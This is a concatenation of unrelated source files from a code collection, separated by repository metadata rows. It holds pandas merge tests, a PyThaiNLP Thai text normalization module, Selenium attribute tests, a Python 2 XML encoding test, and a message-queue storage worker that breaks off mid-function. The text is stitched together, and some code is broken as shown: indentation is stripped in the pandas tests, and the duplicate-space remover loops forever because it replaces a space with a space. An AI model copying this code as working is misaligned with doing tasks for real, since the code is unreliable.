OrderedDict([("left_data", [1, 2]), ("right_data", [1.0, 2.0])]), index=index
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"on,left_on,right_on,left_index,right_index,nm",
[
(["outer", "inner"], None, None, False, False, "B"),
(None, None, None, True, True, "B"),
(None, ["outer", "inner"], None, False, True, "B"),
(None, None, ["outer", "inner"], True, False, "B"),
(["outer", "inner"], None, None, False, False, None),
(None, None, None, True, True, None),
(None, ["outer", "inner"], None, False, True, None),
(None, None, ["outer", "inner"], True, False, None),
],
)
def test_merge_series(on, left_on, right_on, left_index, right_index, nm):
# GH 21220
a = pd.DataFrame(
{"A": [1, 2, 3, 4]},
index=pd.MultiIndex.from_product(
[["a", "b"], [0, 1]], names=["outer", "inner"]
),
)
b = pd.Series(
[1, 2, 3, 4],
index=pd.MultiIndex.from_product(
[["a", "b"], [1, 2]], names=["outer", "inner"]
),
name=nm,
)
expected = pd.DataFrame(
{"A": [2, 4], "B": [1, 3]},
index=pd.MultiIndex.from_product([["a", "b"], [1]], names=["outer", "inner"]),
)
if nm is not None:
result = pd.merge(
a,
b,
on=on,
left_on=left_on,
right_on=right_on,
left_index=left_index,
right_index=right_index,
)
tm.assert_frame_equal(result, expected)
else:
msg = "Cannot merge a Series without a name"
with pytest.raises(ValueError, match=msg):
result = pd.merge(
a,
b,
on=on,
left_on=left_on,
right_on=right_on,
left_index=left_index,
right_index=right_index,
)
@pytest.mark.parametrize(
"col1, col2, kwargs, expected_cols",
[
(0, 0, dict(suffixes=("", "_dup")), ["0", "0_dup"]),
(0, 0, dict(suffixes=(None, "_dup")), [0, "0_dup"]),
(0, 0, dict(suffixes=("_x", "_y")), ["0_x", "0_y"]),
(0, 0, dict(suffixes=["_x", "_y"]), ["0_x", "0_y"]),
("a", 0, dict(suffixes=(None, "_y")), ["a", 0]),
(0.0, 0.0, dict(suffixes=("_x", None)), ["0.0_x", 0.0]),
("b", "b", dict(suffixes=(None, "_y")), ["b", "b_y"]),
("a", "a", dict(suffixes=("_x", None)), ["a_x", "a"]),
("a", "b", dict(suffixes=("_x", None)), ["a", "b"]),
("a", "a", dict(suffixes=(None, "_x")), ["a", "a_x"]),
(0, 0, dict(suffixes=("_a", None)), ["0_a", 0]),
("a", "a", dict(), ["a_x", "a_y"]),
(0, 0, dict(), ["0_x", "0_y"]),
],
)
def test_merge_suffix(col1, col2, kwargs, expected_cols):
# issue: 24782
a = pd.DataFrame({col1: [1, 2, 3]})
b = pd.DataFrame({col2: [4, 5, 6]})
expected = pd.DataFrame([[1, 4], [2, 5], [3, 6]], columns=expected_cols)
result = a.merge(b, left_index=True, right_index=True, **kwargs)
tm.assert_frame_equal(result, expected)
result = pd.merge(a, b, left_index=True, right_index=True, **kwargs)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"how,expected",
[
(
"right",
DataFrame(
{"A": [100, 200, 300], "B1": [60, 70, np.nan], "B2": [600, 700, 800]}
),
),
(
"outer",
DataFrame(
{
"A": [100, 200, 1, 300],
"B1": [60, 70, 80, np.nan],
"B2": [600, 700, np.nan, 800],
}
),
),
],
)
def test_merge_duplicate_suffix(how, expected):
left_df = DataFrame({"A": [100, 200, 1], "B": [60, 70, 80]})
right_df = DataFrame({"A": [100, 200, 300], "B": [600, 700, 800]})
result = merge(left_df, right_df, on="A", how=how, suffixes=("_x", "_x"))
expected.columns = ["A", "B_x", "B_x"]
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"col1, col2, suffixes",
[("a", "a", (None, None)), ("a", "a", ("", None)), (0, 0, (None, ""))],
)
def test_merge_suffix_error(col1, col2, suffixes):
# issue: 24782
a = pd.DataFrame({col1: [1, 2, 3]})
b = pd.DataFrame({col2: [3, 4, 5]})
# TODO: might reconsider current raise behaviour, see issue 24782
msg = "columns overlap but no suffix specified"
with pytest.raises(ValueError, match=msg):
pd.merge(a, b, left_index=True, right_index=True, suffixes=suffixes)
@pytest.mark.parametrize("suffixes", [{"left", "right"}, {"left": 0, "right": 0}])
def test_merge_suffix_warns(suffixes):
a = pd.DataFrame({"a": [1, 2, 3]})
b = pd.DataFrame({"b": [3, 4, 5]})
with tm.assert_produces_warning(FutureWarning):
pd.merge(a, b, left_index=True, right_index=True, suffixes={"left", "right"})
@pytest.mark.parametrize(
"col1, col2, suffixes, msg",
[
("a", "a", ("a", "b", "c"), r"too many values to unpack \(expected 2\)"),
("a", "a", tuple("a"), r"not enough values to unpack \(expected 2, got 1\)"),
],
)
def test_merge_suffix_length_error(col1, col2, suffixes, msg):
a = pd.DataFrame({col1: [1, 2, 3]})
b = pd.DataFrame({col2: [3, 4, 5]})
with pytest.raises(ValueError, match=msg):
pd.merge(a, b, left_index=True, right_index=True, suffixes=suffixes)
@pytest.mark.parametrize("cat_dtype", ["one", "two"])
@pytest.mark.parametrize("reverse", [True, False])
def test_merge_equal_cat_dtypes(cat_dtype, reverse):
# see gh-22501
cat_dtypes = {
"one": CategoricalDtype(categories=["a", "b", "c"], ordered=False),
"two": CategoricalDtype(categories=["a", "b", "c"], ordered=False),
}
df1 = DataFrame(
{"foo": Series(["a", "b", "c"]).astype(cat_dtypes["one"]), "left": [1, 2, 3]}
).set_index("foo")
data_foo = ["a", "b", "c"]
data_right = [1, 2, 3]
if reverse:
data_foo.reverse()
data_right.reverse()
df2 = DataFrame(
{"foo": Series(data_foo).astype(cat_dtypes[cat_dtype]), "right": data_right}
).set_index("foo")
result = df1.merge(df2, left_index=True, right_index=True)
expected = DataFrame(
{
"left": [1, 2, 3],
"right": [1, 2, 3],
"foo": Series(["a", "b", "c"]).astype(cat_dtypes["one"]),
}
).set_index("foo")
tm.assert_frame_equal(result, expected)
def test_merge_equal_cat_dtypes2():
# see gh-22501
cat_dtype = CategoricalDtype(categories=["a", "b", "c"], ordered=False)
# Test Data
df1 = DataFrame(
{"foo": Series(["a", "b"]).astype(cat_dtype), "left": [1, 2]}
).set_index("foo")
df2 = DataFrame(
{"foo": Series(["a", "b", "c"]).astype(cat_dtype), "right": [3, 2, 1]}
).set_index("foo")
result = df1.merge(df2, left_index=True, right_index=True)
expected = DataFrame(
{"left": [1, 2], "right": [3, 2], "foo": Series(["a", "b"]).astype(cat_dtype)}
).set_index("foo")
tm.assert_frame_equal(result, expected)
def test_merge_on_cat_and_ext_array():
# GH 28668
right = DataFrame(
{"a": Series([pd.Interval(0, 1), pd.Interval(1, 2)], dtype="interval")}
)
left = right.copy()
left["a"] = left["a"].astype("category")
result = pd.merge(left, right, how="inner", on="a")
expected = right.copy()
tm.assert_frame_equal(result, expected)
def test_merge_multiindex_columns():
# Issue #28518
    # Verify that merging two dataframes gives the expected labels
    # The original cause of this issue comes from a bug in lexsort_depth and is tested in
# test_lexsort_depth
letters = ["a", "b", "c", "d"]
numbers = ["1", "2", "3"]
index = pd.MultiIndex.from_product((letters, numbers), names=["outer", "inner"])
frame_x = pd.DataFrame(columns=index)
frame_x["id"] = ""
frame_y = pd.DataFrame(columns=index)
frame_y["id"] = ""
l_suf = "_x"
r_suf = "_y"
result = frame_x.merge(frame_y, on="id", suffixes=((l_suf, r_suf)))
# Constructing the expected results
expected_labels = [l + l_suf for l in letters] + [l + r_suf for l in letters]
expected_index = pd.MultiIndex.from_product(
[expected_labels, numbers], names=["outer", "inner"]
)
expected = pd.DataFrame(columns=expected_index)
expected["id"] = ""
tm.assert_frame_equal(result, expected)
def test_merge_datetime_upcast_dtype():
# https://github.com/pandas-dev/pandas/issues/31208
df1 = pd.DataFrame({"x": ["a", "b", "c"], "y": ["1", "2", "4"]})
df2 = pd.DataFrame(
{"y": ["1", "2", "3"], "z": pd.to_datetime(["2000", "2001", "2002"])}
)
result = pd.merge(df1, df2, how="left", on="y")
expected = pd.DataFrame(
{
"x": ["a", "b", "c"],
"y": ["1", "2", "4"],
"z": pd.to_datetime(["2000", "2001", "NaT"]),
}
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("n_categories", [5, 128])
def test_categorical_non_unique_monotonic(n_categories):
# GH 28189
    # With n_categories as 5, we test that the int8 case is hit in libjoin,
    # and with n_categories as 128 we test the int16 case.
left_index = CategoricalIndex([0] + list(range(n_categories)))
df1 = DataFrame(range(n_categories + 1), columns=["value"], index=left_index)
df2 = DataFrame(
[[6]],
columns=["value"],
index=CategoricalIndex([0], categories=np.arange(n_categories)),
)
result = merge(df1, df2, how="left", left_index=True, right_index=True)
expected = DataFrame(
[[i, 6.0] if i < 2 else [i, np.nan] for i in range(n_categories + 1)],
columns=["value_x", "value_y"],
index=left_index,
)
tm.assert_frame_equal(expected, result)
| bsd-3-clause | 2,661,297,586,341,190,700 | 33.908766 | 88 | 0.486048 | false |
PyThaiNLP/pythainlp | pythainlp/util/normalize.py | 1 | 7109 | # -*- coding: utf-8 -*-
"""
Text normalization
"""
import re
import warnings
from pythainlp import thai_above_vowels as above_v
from pythainlp import thai_below_vowels as below_v
from pythainlp import thai_follow_vowels as follow_v
from pythainlp import thai_lead_vowels as lead_v
from pythainlp import thai_tonemarks as tonemarks
_DANGLING_CHARS = f"{above_v}{below_v}{tonemarks}\u0e3a\u0e4c\u0e4d\u0e4e"
_RE_REMOVE_DANGLINGS = re.compile(f"^[{_DANGLING_CHARS}]+")
_ZERO_WIDTH_CHARS = "\u200b\u200c" # ZWSP, ZWNJ
_REORDER_PAIRS = [
("\u0e40\u0e40", "\u0e41"), # Sara E + Sara E -> Sara Ae
(
f"([{tonemarks}\u0e4c]+)([{above_v}{below_v}]+)",
"\\2\\1",
), # TONE/Thanthakhat + ABV/BLW VOWEL -> ABV/BLW VOWEL + TONE/Thanthakhat
(
f"\u0e4d([{tonemarks}]*)\u0e32",
"\\1\u0e33",
), # Nikhahit + TONEMARK + Sara Aa -> TONEMARK + Sara Am
(
f"([{follow_v}]+)([{tonemarks}]+)",
"\\2\\1",
), # FOLLOW VOWEL + TONEMARK+ -> TONEMARK + FOLLOW VOWEL
]
# VOWELS + Phinthu, Thanthakhat, Nikhahit, Yamakkan
_NOREPEAT_CHARS = (
f"{follow_v}{lead_v}{above_v}{below_v}\u0e3a\u0e4c\u0e4d\u0e4e"
)
_NOREPEAT_PAIRS = list(
zip([f"({ch}[ ]*)+{ch}" for ch in _NOREPEAT_CHARS], _NOREPEAT_CHARS)
)
_RE_TONEMARKS = re.compile(f"[{tonemarks}]+")
_RE_REMOVE_NEWLINES = re.compile("[ \n]*\n[ \n]*")
def _last_char(matchobj): # to be used with _RE_NOREPEAT_TONEMARKS
return matchobj.group(0)[-1]
def remove_dangling(text: str) -> str:
"""
Remove Thai non-base characters at the beginning of text.
    This is a common "typo", especially for an input field in a form,
    as these non-base characters can be visually hidden from the user,
    who may have accidentally typed them in.
A character to be removed should be both:
* tone mark, above vowel, below vowel, or non-base sign AND
* located at the beginning of the text
:param str text: input text
:return: text without dangling Thai characters at the beginning
:rtype: str
"""
return _RE_REMOVE_DANGLINGS.sub("", text)
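# Illustrative example (assumed, not part of the original module): a dangling
# leading tone mark (Mai Ek, U+0E48) is stripped, the rest is left untouched.
#
#     >>> remove_dangling("\u0e48\u0e2a\u0e27\u0e31\u0e2a\u0e14\u0e35")
#     'สวัสดี'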
def remove_dup_spaces(text: str) -> str:
"""
Remove duplicate spaces. Replace multiple spaces with one space.
Multiple newline characters and empty lines will be replaced
with one newline character.
:param str text: input text
:return: text without duplicated spaces and newlines
:rtype: str
"""
while " " in text:
text = text.replace(" ", " ")
text = _RE_REMOVE_NEWLINES.sub("\n", text)
text = text.strip()
return text
def remove_tonemark(text: str) -> str:
"""
Remove all Thai tone marks from the text.
Thai script has four tone marks indicating four tones as follows:
* Down tone (Thai: ไม้เอก _่ )
* Falling tone (Thai: ไม้โท _้ )
* High tone (Thai: ไม้ตรี _๊ )
* Rising tone (Thai: ไม้จัตวา _๋ )
    Putting the wrong tone mark is a common mistake in Thai writing.
    By removing tone marks from the string, it can be used
    for approximate string matching.
:param str text: input text
:return: text without Thai tone marks
:rtype: str
:Example:
::
        from pythainlp.util import remove_tonemark
        remove_tonemark('สองพันหนึ่งร้อยสี่สิบเจ็ดล้านสี่แสนแปดหมื่นสามพันหกร้อยสี่สิบเจ็ด')
# output: สองพันหนึงรอยสีสิบเจ็ดลานสีแสนแปดหมืนสามพันหกรอยสีสิบเจ็ด
"""
for ch in tonemarks:
while ch in text:
text = text.replace(ch, "")
return text
def remove_zw(text: str) -> str:
"""
Remove zero-width characters.
    These non-visible characters may cause unexpected results from the
user's point of view. Removing them can make string matching more robust.
Characters to be removed:
* Zero-width space (ZWSP)
    * Zero-width non-joiner (ZWNJ)
:param str text: input text
:return: text without zero-width characters
:rtype: str
"""
for ch in _ZERO_WIDTH_CHARS:
while ch in text:
text = text.replace(ch, "")
return text
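# Illustrative example (assumed): a zero-width space between two characters is
# dropped, so "a\u200bb" becomes "ab".
#
#     >>> remove_zw("a\u200bb")
#     'ab'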
def reorder_vowels(text: str) -> str:
"""
Reorder vowels and tone marks to the standard logical order/spelling.
Characters in input text will be reordered/transformed,
according to these rules:
* Sara E + Sara E -> Sara Ae
* Nikhahit + Sara Aa -> Sara Am
* tone mark + non-base vowel -> non-base vowel + tone mark
* follow vowel + tone mark -> tone mark + follow vowel
:param str text: input text
:return: text with vowels and tone marks in the standard logical order
:rtype: str
"""
for pair in _REORDER_PAIRS:
text = re.sub(pair[0], pair[1], text)
return text
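# Illustrative example (assumed, mirroring the rules above): two leading
# Sara E characters are folded into a single Sara Ae.
#
#     >>> reorder_vowels("\u0e40\u0e40\u0e1b\u0e25\u0e01")  # เเปลก
#     'แปลก'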
def remove_repeat_vowels(text: str) -> str:
"""
Remove repeating vowels, tone marks, and signs.
This function will call reorder_vowels() first, to make sure that
double Sara E will be converted to Sara Ae and not be removed.
:param str text: input text
:return: text without repeating Thai vowels, tone marks, and signs
:rtype: str
"""
text = reorder_vowels(text)
for pair in _NOREPEAT_PAIRS:
text = re.sub(pair[0], pair[1], text)
# remove repeating tone marks, use last tone mark
text = _RE_TONEMARKS.sub(_last_char, text)
return text
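# Illustrative example (assumed): a repeated Sara Aa is collapsed to a single
# occurrence, matching the normalize() example below.
#
#     >>> remove_repeat_vowels("\u0e19\u0e32\u0e19\u0e32\u0e32\u0e32")  # นานาาา
#     'นานา'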
def normalize(text: str) -> str:
"""
Normalize and clean Thai text with normalizing rules as follows:
* Remove zero-width spaces
* Remove duplicate spaces
* Reorder tone marks and vowels to standard order/spelling
* Remove duplicate vowels and signs
* Remove duplicate tone marks
* Remove dangling non-base characters at the beginning of text
normalize() simply call remove_zw(), remove_dup_spaces(),
remove_repeat_vowels(), and remove_dangling(), in that order.
If a user wants to customize the selection or the order of rules
to be applied, they can choose to call those functions by themselves.
Note: for Unicode normalization, see unicodedata.normalize().
:param str text: input text
    :return: normalized text according to the rules
:rtype: str
:Example:
::
from pythainlp.util import normalize
normalize('เเปลก') # starts with two Sara E
# output: แปลก
normalize('นานาาา')
# output: นานา
"""
text = remove_zw(text)
text = remove_dup_spaces(text)
text = remove_repeat_vowels(text)
text = remove_dangling(text)
return text
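# Minimal sketch (assumed, not from the original module) of applying the
# individual steps manually, in the same order normalize() uses, for callers
# that want to customize the selection or order of rules:
#
#     >>> text = "\u200b  \u0e40\u0e40\u0e1b\u0e25\u0e01  "
#     >>> text = remove_zw(text)
#     >>> text = remove_dup_spaces(text)
#     >>> text = remove_repeat_vowels(text)
#     >>> remove_dangling(text)
#     'แปลก'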
def delete_tone(text: str) -> str:
"""
DEPRECATED: Please use remove_tonemark().
"""
warnings.warn(
"delete_tone is deprecated, use remove_tonemark instead",
DeprecationWarning,
)
return remove_tonemark(text)
| apache-2.0 | -8,998,425,384,468,573,000 | 27.1875 | 88 | 0.637103 | false |
sankha93/selenium | py/test/selenium/webdriver/common/element_attribute_tests.py | 1 | 11886 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import pytest
class ElementAttributeTests(unittest.TestCase):
def testShouldReturnNullWhenGettingTheValueOfAnAttributeThatIsNotListed(self):
self._loadSimplePage()
head = self.driver.find_element_by_xpath("/html")
attribute = head.get_attribute("cheese")
self.assertTrue(attribute is None)
def testShouldReturnNullWhenGettingSrcAttributeOfInvalidImgTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("invalidImgTag")
img_attr = img.get_attribute("src")
self.assertEqual(img_attr, None)
def testShouldReturnAnAbsoluteUrlWhenGettingSrcAttributeOfAValidImgTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("validImgTag")
img_attr = img.get_attribute("src")
self.assertTrue("icon.gif" in img_attr)
def testShouldReturnAnAbsoluteUrlWhenGettingHrefAttributeOfAValidAnchorTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("validAnchorTag")
img_attr = img.get_attribute("href")
self.assertTrue("icon.gif" in img_attr)
def testShouldReturnEmptyAttributeValuesWhenPresentAndTheValueIsActuallyEmpty(self):
self._loadSimplePage()
body = self.driver.find_element_by_xpath("//body")
self.assertEqual("", body.get_attribute("style"))
def testShouldReturnTheValueOfTheDisabledAttributeAsFalseIfNotSet(self):
self._loadPage("formPage")
inputElement = self.driver.find_element_by_xpath("//input[@id='working']")
self.assertEqual(None, inputElement.get_attribute("disabled"))
self.assertTrue(inputElement.is_enabled())
pElement = self.driver.find_element_by_id("peas")
self.assertEqual(None, pElement.get_attribute("disabled"))
self.assertTrue(pElement.is_enabled())
    def testShouldReturnTheValueOfTheIndexAttributeEvenIfItIsMissing(self):
self._loadPage("formPage")
multiSelect = self.driver.find_element_by_id("multi")
options = multiSelect.find_elements_by_tag_name("option")
self.assertEqual("1", options[1].get_attribute("index"))
def testShouldIndicateTheElementsThatAreDisabledAreNotis_enabled(self):
self._loadPage("formPage")
inputElement = self.driver.find_element_by_xpath("//input[@id='notWorking']")
self.assertFalse(inputElement.is_enabled())
inputElement = self.driver.find_element_by_xpath("//input[@id='working']")
self.assertTrue(inputElement.is_enabled())
def testElementsShouldBeDisabledIfTheyAreDisabledUsingRandomDisabledStrings(self):
self._loadPage("formPage")
disabledTextElement1 = self.driver.find_element_by_id("disabledTextElement1")
self.assertFalse(disabledTextElement1.is_enabled())
disabledTextElement2 = self.driver.find_element_by_id("disabledTextElement2")
self.assertFalse(disabledTextElement2.is_enabled())
disabledSubmitElement = self.driver.find_element_by_id("disabledSubmitElement")
self.assertFalse(disabledSubmitElement.is_enabled())
def testShouldIndicateWhenATextAreaIsDisabled(self):
self._loadPage("formPage")
textArea = self.driver.find_element_by_xpath("//textarea[@id='notWorkingArea']")
self.assertFalse(textArea.is_enabled())
def testShouldThrowExceptionIfSendingKeysToElementDisabledUsingRandomDisabledStrings(self):
self._loadPage("formPage")
disabledTextElement1 = self.driver.find_element_by_id("disabledTextElement1")
try:
disabledTextElement1.send_keys("foo")
self.fail("Should have thrown exception")
except Exception:
pass
self.assertEqual("", disabledTextElement1.text)
disabledTextElement2 = self.driver.find_element_by_id("disabledTextElement2")
try:
disabledTextElement2.send_keys("bar")
self.fail("Should have thrown exception")
except Exception:
pass
self.assertEqual("", disabledTextElement2.text)
def testShouldIndicateWhenASelectIsDisabled(self):
self._loadPage("formPage")
enabled = self.driver.find_element_by_name("selectomatic")
disabled = self.driver.find_element_by_name("no-select")
self.assertTrue(enabled.is_enabled())
self.assertFalse(disabled.is_enabled())
def testShouldReturnTheValueOfCheckedForACheckboxEvenIfItLacksThatAttribute(self):
self._loadPage("formPage")
checkbox = self.driver.find_element_by_xpath("//input[@id='checky']")
self.assertTrue(checkbox.get_attribute("checked") is None)
checkbox.click()
self.assertEqual("true", checkbox.get_attribute("checked"))
def testShouldReturnTheValueOfSelectedForRadioButtonsEvenIfTheyLackThatAttribute(self):
self._loadPage("formPage")
neverSelected = self.driver.find_element_by_id("cheese")
initiallyNotSelected = self.driver.find_element_by_id("peas")
initiallySelected = self.driver.find_element_by_id("cheese_and_peas")
        self.assertTrue(neverSelected.get_attribute("checked") is None)
        self.assertTrue(initiallyNotSelected.get_attribute("checked") is None)
self.assertEqual("true", initiallySelected.get_attribute("checked"))
initiallyNotSelected.click()
self.assertEqual(neverSelected.get_attribute("selected"), None)
self.assertEqual("true", initiallyNotSelected.get_attribute("checked"))
self.assertEqual(initiallySelected.get_attribute("checked"), None)
def testShouldReturnTheValueOfSelectedForOptionsInSelectsEvenIfTheyLackThatAttribute(self):
self._loadPage("formPage")
selectBox = self.driver.find_element_by_xpath("//select[@name='selectomatic']")
options = selectBox.find_elements_by_tag_name("option")
one = options[0]
two = options[1]
self.assertTrue(one.is_selected())
self.assertFalse(two.is_selected())
self.assertEqual("true", one.get_attribute("selected"))
self.assertEqual(two.get_attribute("selected"), None)
def testShouldReturnValueOfClassAttributeOfAnElement(self):
self._loadPage("xhtmlTest")
heading = self.driver.find_element_by_xpath("//h1")
classname = heading.get_attribute("class")
self.assertEqual("header", classname)
# Disabled due to issues with Frames
# def testShouldReturnValueOfClassAttributeOfAnElementAfterSwitchingIFrame(self):
# self._loadPage("iframes")
# self.driver.switch_to.frame("iframe1")
#
# wallace = self.driver.find_element_by_xpath("//div[@id='wallace']")
# classname = wallace.get_attribute("class")
# self.assertEqual("gromit", classname)
def testShouldReturnTheContentsOfATextAreaAsItsValue(self):
self._loadPage("formPage")
value = self.driver.find_element_by_id("withText").get_attribute("value")
self.assertEqual("Example text", value)
def testShouldReturnTheContentsOfATextAreaAsItsValueWhenSetToNonNorminalTrue(self):
self._loadPage("formPage")
e = self.driver.find_element_by_id("withText")
self.driver.execute_script("arguments[0].value = 'tRuE'", e)
value = e.get_attribute("value")
self.assertEqual("tRuE", value)
def testShouldTreatReadonlyAsAValue(self):
self._loadPage("formPage")
element = self.driver.find_element_by_name("readonly")
readOnlyAttribute = element.get_attribute("readonly")
textInput = self.driver.find_element_by_name("x")
notReadOnly = textInput.get_attribute("readonly")
self.assertNotEqual(readOnlyAttribute, notReadOnly)
def testShouldGetNumericAtribute(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("withText")
self.assertEqual("5", element.get_attribute("rows"))
def testCanReturnATextApproximationOfTheStyleAttribute(self):
self._loadPage("javascriptPage")
style = self.driver.find_element_by_id("red-item").get_attribute("style")
self.assertTrue("background-color" in style.lower())
def testShouldCorrectlyReportValueOfColspan(self):
self._loadPage("tables")
th1 = self.driver.find_element_by_id("th1")
td2 = self.driver.find_element_by_id("td2")
self.assertEqual("th1", th1.get_attribute("id"))
self.assertEqual("3", th1.get_attribute("colspan"))
self.assertEqual("td2", td2.get_attribute("id"))
        self.assertEqual("2", td2.get_attribute("colspan"))
def testCanRetrieveTheCurrentValueOfATextFormField_textInput(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("working")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("hello world")
self.assertEqual("hello world", element.get_attribute("value"))
def testCanRetrieveTheCurrentValueOfATextFormField_emailInput(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("email")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("[email protected]")
self.assertEqual("[email protected]", element.get_attribute("value"))
def testCanRetrieveTheCurrentValueOfATextFormField_textArea(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("emptyTextArea")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("hello world")
self.assertEqual("hello world", element.get_attribute("value"))
@pytest.mark.ignore_chrome
def testShouldReturnNullForNonPresentBooleanAttributes(self):
self._loadPage("booleanAttributes")
element1 = self.driver.find_element_by_id("working")
self.assertEqual(None, element1.get_attribute("required"))
@pytest.mark.ignore_ie
def testShouldReturnTrueForPresentBooleanAttributes(self):
self._loadPage("booleanAttributes")
element1 = self.driver.find_element_by_id("emailRequired")
self.assertEqual("true", element1.get_attribute("required"))
element2 = self.driver.find_element_by_id("emptyTextAreaRequired")
self.assertEqual("true", element2.get_attribute("required"))
element3 = self.driver.find_element_by_id("inputRequired")
self.assertEqual("true", element3.get_attribute("required"))
element4 = self.driver.find_element_by_id("textAreaRequired")
self.assertEqual("true", element4.get_attribute("required"))
    def testShouldGetUnicodeCharsFromAttribute(self):
self._loadPage("formPage")
title = self.driver.find_element_by_id("vsearchGadget").get_attribute("title")
self.assertEqual('Hvad s\xf8ger du?', title)
def _pageURL(self, name):
return self.webserver.where_is(name + '.html')
def _loadSimplePage(self):
self._loadPage("simpleTest")
def _loadPage(self, name):
self.driver.get(self._pageURL(name))
| apache-2.0 | -259,758,264,384,351,170 | 44.193916 | 95 | 0.698553 | false |
Pikecillo/genna | external/PyXML-0.8.4/test/test_encodings.py | 1 | 1292 | #!/usr/bin/env python
"""
This will show Russian text in KOI8-R encoding.
"""
from xml.parsers import expat
import string
# Produces ImportError in 1.5, since this test can't possibly pass there
import codecs
class XMLTree:
def __init__(self):
pass
# Define a handler for start element events
def StartElement(self, name, attrs ):
#name = name.encode()
print "<", repr(name), ">"
print "attr name:", attrs.get("name",unicode("")).encode("koi8-r")
print "attr value:", attrs.get("value",unicode("")).encode("koi8-r")
def EndElement(self, name ):
print "</", repr(name), ">"
def CharacterData(self, data ):
if string.strip(data):
data = data.encode("koi8-r")
print data
def LoadTree(self, filename):
# Create a parser
Parser = expat.ParserCreate()
# Tell the parser what the start element handler is
Parser.StartElementHandler = self.StartElement
Parser.EndElementHandler = self.EndElement
Parser.CharacterDataHandler = self.CharacterData
# Parse the XML File
ParserStatus = Parser.Parse(open(filename,'r').read(), 1)
def runTest():
win = XMLTree()
win.LoadTree("enc_test.xml")
return win
runTest()
| gpl-2.0 | 5,979,302,557,912,319,000 | 24.333333 | 76 | 0.619969 | false |
CRAWLZSTAGE/infra | store/store.py | 1 | 6657 | import os, sys
import pika
import json
import time
import traceback
from peewee import *
# DEBUG = int(os.environ.get('DEBUG'))
MQTT_HOST = os.environ.get('MQTT_HOST')
MQTT_USER = os.environ.get('MQTT_USER')
MQTT_PASSWORD = os.environ.get('MQTT_PASSWORD')
import sys
import signal
def handler(signum, frame):
sys.exit(1)
signal.signal(signal.SIGTERM, handler)
"""
PSQL ORM courtesy of PeeWee
No need for schema.sql since PeeWee can take care of this for us!
"""
from databaseModel import psql_db, BaseModel, FacebookContact, LinkedInContact, FourSquareContact, GoogleContact, updateFacebookContact, updateLinkedInContact, updateFourSquareContact, updateGoogleContact
while True:
try:
psql_db.connect()
break
except Exception as e:
sys.stderr.write("Unable to connect to PSQL: \n" + str(e) + "\n")
traceback.print_exc()
sys.stderr.flush()
time.sleep(5)
if not FacebookContact.table_exists():
FacebookContact.create_table()
if not LinkedInContact.table_exists():
LinkedInContact.create_table()
if not FourSquareContact.table_exists():
FourSquareContact.create_table()
if not GoogleContact.table_exists():
GoogleContact.create_table()
"""
if not FTSFacebookContact.table_exists():
FTSFacebookContact.create_table()
if not FTSLinkedInContact.table_exists():
FTSLinkedInContact.create_table()
if not FTSFourSquareContact.table_exists():
FTSFourSquareContact.create_table()
if not FTSGoogleContact.table_exists():
FTSGoogleContact.create_table()
"""
"""
RabbitMQ support courtesy of Pika
MQTT tutorial from
https://cuongba.com/install-rabbitmq-and-send-json-data-with-python-on-ubuntu/
"""
while True:
try:
_credentials = pika.PlainCredentials(MQTT_USER, MQTT_PASSWORD)
mqtt_connection = pika.BlockingConnection(pika.ConnectionParameters(host=MQTT_HOST, credentials=_credentials))
break
except Exception:
time.sleep(5)
pqdata = dict()
pqdata['x-max-priority'] = 5
ingress_channel = mqtt_connection.channel()
ingress_channel.exchange_declare(exchange='admin', type='fanout')
ingress_channel.queue_declare(queue='store', durable=True, arguments=pqdata)
admin_queue = ingress_channel.queue_declare(arguments=pqdata)
ingress_channel.queue_bind(exchange="admin", queue=admin_queue.method.queue)
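# Illustrative producer-side sketch (not part of this worker): the callback
# below expects a JSON body carrying "org_name", "protocol" and one of the
# *_resource_locator keys, so a publisher might send something like this
# (all values are hypothetical):
#
#   ingress_channel.basic_publish(
#       exchange='',
#       routing_key='store',
#       body=json.dumps({
#           "org_name": "Example Org",
#           "protocol": "fb",
#           "facebook_resource_locator": "https://facebook.com/example",
#       }))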
"""
Message Handling
This is really ugly, should introduce classes
"""
def callback(ch, method, properties, body):
try:
data = json.loads(body)
if not data.has_key("org_name") or not data.has_key("protocol"):
return
if not data.has_key("facebook_resource_locator") and not data.has_key("linkedin_resource_locator") and not data.has_key("foursquare_resource_locator") and not data.has_key("google_resource_locator"):
raise Exception("Unable to identify resource")
if data["protocol"] == "fb":
newContact = FacebookContact.select().where(FacebookContact.facebook_resource_locator == data["facebook_resource_locator"])
if newContact.exists():
newContact = newContact.get()
else:
newContact = FacebookContact(facebook_resource_locator=data["facebook_resource_locator"])
try:
newContact.save(force_insert=True)
            except Exception as e:
                """
                Collide, should not happen!
                """
                sys.stderr.write("Collision occurred: " + str(e))
psql_db.rollback()
updateFacebookContact(data)
elif data["protocol"] == "linkedin":
newContact = LinkedInContact.select().where(LinkedInContact.linkedin_resource_locator == data["linkedin_resource_locator"])
if newContact.exists():
newContact = newContact.get()
else:
newContact = LinkedInContact(linkedin_resource_locator=data["linkedin_resource_locator"])
try:
newContact.save(force_insert=True)
            except Exception as e:
                sys.stderr.write("Collision occurred: " + str(e))
psql_db.rollback()
updateLinkedInContact(data)
elif data["protocol"] == "fsquare":
newContact = FourSquareContact.select().where(FourSquareContact.foursquare_resource_locator == data["foursquare_resource_locator"])
if newContact.exists():
